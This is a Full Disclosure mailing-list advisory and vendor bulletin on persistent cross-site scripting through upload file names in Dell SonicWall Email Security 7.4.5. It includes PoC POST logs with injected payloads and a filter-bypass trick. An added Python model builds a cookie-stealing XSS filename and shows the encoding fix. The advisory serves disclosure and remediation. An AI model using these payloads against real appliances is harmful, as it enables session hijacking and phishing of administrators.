List: full-disclosure
Subject: [FD] Dell SonicWall EMail Security 7.4.5 - Multiple Vulnerabilities (Bulletin)
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2014-03-28 12:56:34
Message-ID: 53357182.8040705 () vulnerability-lab ! com
Document Title:
===============
Dell SonicWall EMail Security 7.4.5 - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1191
Dell (SonicWall) Security Bulletin: http://www.sonicwall.com/us/shared/download/Support-Bulletin_Email-Security_Scripting_Vulnerability__Resolved_in__ES746.pdf
Release Date:
=============
2014-03-26
Vulnerability Laboratory ID (VL-ID):
====================================
1191
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
While most businesses now have some type of anti-spam protection, many must deal with cumbersome management, frustrated users, inflexible solutions, and a higher-than-expected total cost of ownership. SonicWALL ® Email Security can help. Elegantly simple to deploy, manage and use, award-winning SonicWALL Email Security solutions employ a variety of proven and patented technology designed to block spam and other threats effectively, easily and economically. With innovative protection techniques for both inbound and outbound email plus unique management tools, the Email Security platform delivers superior email protection today, while standing ready to stop the new attacks of tomorrow.
SonicWALL Email Security can be flexibly deployed as a SonicWALL Email Security Appliance, as a software application on a third party Windows ® server, or as a SonicWALL Email Security Virtual Appliance in a VMW ® environment. The SonicWALL Email Security Virtual Appliance provides the same powerful protection as a traditional SonicWALL Email Security appliance, only in a virtual form, to optimize utilization, ease migration and reduce capital costs.
(Copy of the Vendor Homepage: http://www.sonicwall.com/us/products/Anti-Spam_Email_Security.html)
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation vulnerabilities in the web application of the official Dell SonicWall EMail Security Appliance v7.4.5 (build 7.4.5.1393). The vendor resolved the issues in v7.4.6.
Vulnerability Disclosure Timeline:
==================================
2014-02-07: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-02-08: Vendor Notification (Dell Security Team)
2014-02-14: Vendor Response/Feedback (Dell Security Team)
2014-03-25: Vendor Fix/Patch (SonicWall Developer Team)
2014-03-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DELL SonicWall
Product: EMail Security Appliance Application 7.4.5.1393
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities have been discovered in the web application of the official Dell SonicWall EMail Security Appliance v7.4.5. The vulnerabilities allow remote attackers or low-privileged user accounts to inject their own script code via a POST request and thereby compromise the application or the session data of other users.
The first vulnerability is located in the `filename` value of the file upload in `settings_advanced.html`. Remote attackers and low-privileged application user accounts are able to inject script code into the application side of the `Advanced Settings - Upload Patch > Patch File` module (German UI: `Patch hochladen > Patch-Datei`). The attacker intercepts the multipart file upload POST request of an authenticated session and replaces the `filename` attribute of the `uploadPatch` part with the script payload. The application then loads the firmware upgrade waiting page (wait.html), which prints the file details; the injected script executes at the position where the file name is displayed, because the value is written into the page without output encoding. The security risk of this persistent input validation web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.5(-).
The second vulnerability is located in the file name value of the `settings_upload_dlicense.html` upload. Remote attackers and low-privileged application user accounts are able to inject script code into the application side of the `License Management - License Upload` module (German UI: `Lizenz Verwaltung - Lizenzen Upload`). The request method is POST and the attack vector is persistent. Execution occurs in the exception (error) context of the license update page. The security risk of this persistent input validation web vulnerability is estimated as medium with a CVSS count of 3.0(+).
Exploitation of both vulnerabilities requires bypassing the regular input validation of the appliance web application. To bypass the filter, the attacker injects two payloads separated by a split (the `>>"%20<` prefix in the PoC below): the validation routine encodes the first injected part, while the second part after the split is written to the page unencoded and executes.
Exploitation requires either a privileged (authenticated) user account without further user interaction, or a remote attacker who induces medium to high user interaction from an authenticated user. Successful exploitation of the persistent web vulnerabilities results in session hijacking, persistent external redirects, persistent phishing and persistent manipulation of the vulnerable or connected modules.
Request Method:
[+] POST
Vulnerable Module:
[+] Advanced Settings - Upload Patch > Patch File (settings_advanced.html)
[+] License Management - License Upload (settings_upload_dlicense.html)
Vulnerable Parameter(s):
[+] file name
Affected Module(s):
[+] Firmware Update - Waiting Page (wait.html)
[+] License Update Page (exception)
Affected Version(s):
[+] 7.4.5 (build 7.4.5.1393); fixed in 7.4.6
Affected Appliance Model(s):
[+] Dell SonicWall EMail Security Appliance Web Application - All Models
Proof of Concept (PoC):
=======================
The two persistent input validation web vulnerabilities can be exploited by a remote attacker who holds a low-privileged Email Security application user account (low user interaction), or, without an account, client-side by having an authenticated user submit the crafted POST request (POST injection). For a security demonstration or to reproduce the vulnerability, follow the information and steps provided below.
URL: Input
http://ess.localhost:8619/settings_advanced.html
URL: Execute
http://ess.localhost:8619/wait.html
PoC: Firmware Update - Status Waiting Page (German UI text translated)
<div style="border-radius: 10px;" class="warning_bubble_content">
<div class="bubble_title">The firmware is being updated...</div>
<div class="bubble_text">
<div id="updaterMessage">
Installation files are being prepared. Do not restart any services!
<div class="alert">Email Security is still busy processing e-mails.</div> </div>
<div>Current product version of Email Security 7.4.5.1393.</div>
<div>Upgrade with >>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg.</div>
<br>
<div><div class="dotdot lefthand"></div></div>
<div>Elapsed time: <span id="updateMS">00:00:36</span></div>
<div id="installProgressText" class="tail_trail"></div>
</div>
</div>
--- PoC Session Logs [POST] ---
Status: 302[Moved Temporarily]
POST http://ess.localhost:8619/settings_advanced.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[0] Mime Type[text/html] Request Header:
Host[esserver.demo.sonicwall.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://esserver.demo.sonicwall.com/settings_advanced.html]
Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=48D1C2695CBD91CAAA187C5A9DFFD5DC]
Connection[keep-alive]
POST data:
POST_DATA[-----------------------------213272019431414
Content-Disposition: form-data; name="sortFiles"
false
-----------------------------213272019431414
Content-Disposition: form-data; name="smtpBanner"
> <><iframe src=http://www.vulnerability-lab.com/> ;)
-----------------------------213272019431414
Content-Disposition: form-data; name="receivedBy"
-----------------------------213272019431414
Content-Disposition: form-data; name="dnsTimeout"
2
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryAgeDays"
10
-----------------------------213272019431414
Content-Disposition: form-data; name="whiteListSelf"
true
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryInbound"
false
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryOutbound"
false
-----------------------------213272019431414
Content-Disposition: form-data; name="logLevel"
fatal
-----------------------------213272019431414
Content-Disposition: form-data; name="dbAging"
366
-----------------------------213272019431414
Content-Disposition: form-data; name="snmpOn"
true
-----------------------------213272019431414
Content-Disposition: form-data; name="snmpComStr"
snwl>>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg
-----------------------------213272019431414
Content-Disposition: form-data; name="uploadPatch"; filename=>>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg"
Content-Type: image/jpeg
1.2
URL: Input
http://ess.localhost:8619/settings_dlicense.html
URL: Execute
http://ess.localhost:8619/settings_upload_dlicense.html
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://ess.localhost:8619/settings_upload_dlicense.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html] Request Header:
Host[esserver.demo.sonicwall.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://esserver.demo.sonicwall.com/settings_upload_dlicense.html]
Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=48D1C2695CBD91CAAA187C5A9DFFD5DC; __utma=227649090.1810522928.1391719457.1391719457.1391719457.1; __utmb=227649090.2.10.1391719457; __utmc=227649090; __utmz=227649090.1391719457.1.1.utmcsr=esserver.demo.sonicwall.com|utmccn=(referral)|utmcmd=referral|utmcct=/settings_branding.html; __utmv=227649090.| 1=User%3AUnkown=Unknown=1; s_vi=[CS]v1|2979FA11051D0AC5-40000137600ADB77[CE]]
Connection[keep-alive]
POST data:
POST_DATA[-----------------------------281841889227097
Content-Disposition: form-data; name="uploadLicenses"; filename=">>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg"
Content-Type: image/jpeg
Solution - Fix & Patch:
=======================
Both vulnerabilities can be patched by securely parsing and encoding the file name value in the two affected upload POST requests: normalise the submitted file name on the server side (drop any path component, accept only a conservative character set) and apply HTML output encoding wherever the name is displayed. The output values in wait.html and in the license exception page must also be filtered and encoded, so that the pages stay safe even if the input validation is bypassed.
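The upload flow from the Technical Details and the fix proposed above, as an added example that is not code from the advisory, from Dell SonicWall, or from the appliance (whose server-side code is not public). The multipart body is constructed to mimic the captured settings_advanced.html request, the `extension_check` function is a hypothetical stand-in for whatever validation the appliance performs, and the split-payload filter bypass is not modelled: the point is the sink (an unencoded file name in the wait.html status line) and the two-layer fix (server-side file name normalisation plus HTML output encoding at the output point). The license upload from the second PoC has the same shape, only the part name (`uploadLicenses`) differs.

```python
"""Model of the upload-filename XSS described in this advisory (added example).

Constructed inputs only: the multipart body mimics the captured
settings_advanced.html POST, and the renderers mimic the wait.html status
line. The appliance's real server-side code is not public; extension_check
is a hypothetical stand-in for whatever validation it performs.
"""
import html
import re
from typing import Dict, List, Optional

# Boundary string taken from the captured request in the PoC above.
BOUNDARY = "---------------------------213272019431414"

# Constructed payload: closes the surrounding context and injects a script tag.
XSS_FILENAME = '"><script>alert(document.cookie)</script>.jpg'

# Constructed multipart/form-data body: one plain field plus the uploadPatch part.
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="snmpOn"\r\n\r\n'
    "true\r\n"
    f"--{BOUNDARY}\r\n"
    f'Content-Disposition: form-data; name="uploadPatch"; filename="{XSS_FILENAME}"\r\n'
    "Content-Type: image/jpeg\r\n\r\n"
    "1.2\r\n"
    f"--{BOUNDARY}--\r\n"
)


def parse_multipart(body: str, boundary: str) -> List[Dict[str, Optional[str]]]:
    """Lenient multipart/form-data parser (like a tolerant server): one dict per
    part with name, filename (None for ordinary fields) and content.  The
    filename is taken verbatim up to the end of the header line, so a payload
    containing quotes or angle brackets survives parsing intact."""
    parts = []
    for chunk in body.split(f"--{boundary}"):
        chunk = chunk.strip("\r\n")
        if not chunk or chunk == "--":        # preamble / closing delimiter
            continue
        head, _, content = chunk.partition("\r\n\r\n")
        disp = next((h for h in head.split("\r\n")
                     if h.lower().startswith("content-disposition:")), "")
        name = re.search(r'name="([^"]*)"', disp)
        fn = re.search(r"filename=(.*)$", disp)
        filename = fn.group(1) if fn else None
        if filename and len(filename) >= 2 and filename[0] == filename[-1] == '"':
            filename = filename[1:-1]         # strip only the outermost quotes
        parts.append({"name": name.group(1) if name else None,
                      "filename": filename, "content": content})
    return parts


def extension_check(filename: str) -> bool:
    """Hypothetical upload validation: accept by extension only.  It says nothing
    about what the name does once it is echoed into HTML."""
    return filename.lower().endswith((".jpg", ".jpeg", ".zip"))


def render_wait_vulnerable(filename: str, version: str = "7.4.5.1393") -> str:
    """Mirrors the wait.html status line: the file name is written into the
    markup unencoded, which is the sink exploited in the advisory."""
    return (f"<div>Current product version of Email Security {version}.</div>\n"
            f"<div>Upgrade with {filename}.</div>")


def safe_filename(filename: str) -> str:
    """Server-side normalisation: drop any path component, then allow only a
    conservative character set.  Everything else becomes '_'."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return re.sub(r"[^A-Za-z0-9._-]", "_", base) or "upload"


def render_wait_hardened(filename: str, version: str = "7.4.5.1393") -> str:
    """Fix from the Solution section: normalise the stored name and HTML-encode
    it at the output point.  Both layers are applied so the page stays safe
    even if an input filter is bypassed."""
    shown = html.escape(safe_filename(filename), quote=True)
    return (f"<div>Current product version of Email Security {html.escape(version)}.</div>\n"
            f"<div>Upgrade with {shown}.</div>")


def demo(body: str = SAMPLE_BODY) -> Dict[str, str]:
    """Walk the constructed request through the check and both renderers."""
    upload = next(p for p in parse_multipart(body, BOUNDARY) if p["name"] == "uploadPatch")
    name = upload["filename"]
    return {
        "filename": name,
        "passes_extension_check": str(extension_check(name)),
        "vulnerable": render_wait_vulnerable(name),
        "hardened": render_wait_hardened(name),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}:\n{value}\n")
```

Running the script shows the payload passing the extension check (it ends in `.jpg`, as in the captured request) and landing verbatim in the vulnerable rendering, while the hardened rendering shows only a normalised, encoded name. The encoding step uses `quote=True` so the same helper is safe if the name is ever placed inside an attribute rather than element text.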
SonicWall Solution:
===================
We recommend existing users of Dell SonicWALL Email Security upgrade to version 7.4.6 to prevent this cross-site script injection from being executed by unauthorized users. Email Security 7.4.6 is available for download from www.mysonicwall.com. Users should log into mySonicWALL and click on Downloads > Download Center in the navigation panel in the left-hand navigation, then select "Email Security" in the Software Type drop-down menu.
Security Risk:
==============
The security risk of the persistent POST-injection web vulnerabilities is estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team and the specific authors or managers. To record, list (feed), modify, use or edit our material, contact admin@vulnerability-lab.com or research@vulnerability-lab.com to get permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
-------------------
Document Title:
===============
ES746 Support-Bulletin - EMS Vulnerability Resolved
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1241
Download: http://www.vulnerability-lab.com/resources/bulletins/Support-Bulletin_Email-Security_Scripting_Vulnerability__Resolved_in__ES746.pdf
Original: http://www.sonicwall.com/us/shared/download/Support-Bulletin_Email-Security_Scripting_Vulnerability__Resolved_in__ES746.pdf
Advisory: http://www.vulnerability-lab.com/get_content.php?id=1191
Release Date:
=============
2014-03-26
Vulnerability Laboratory ID (VL-ID):
====================================
1241
Common Vulnerability Scoring System:
====================================
3.5
Vulnerability Disclosure Timeline:
==================================
2014-03-27: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Bulletins
Severity Level:
===============
Medium
Technical Details & Description:
================================
A cross-site scripting vulnerability was reported in the 'License Management' and 'Advanced' pages of Dell SonicWALL Email Security version 7.4.5 that could enable a logged in user to inject malicious code.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/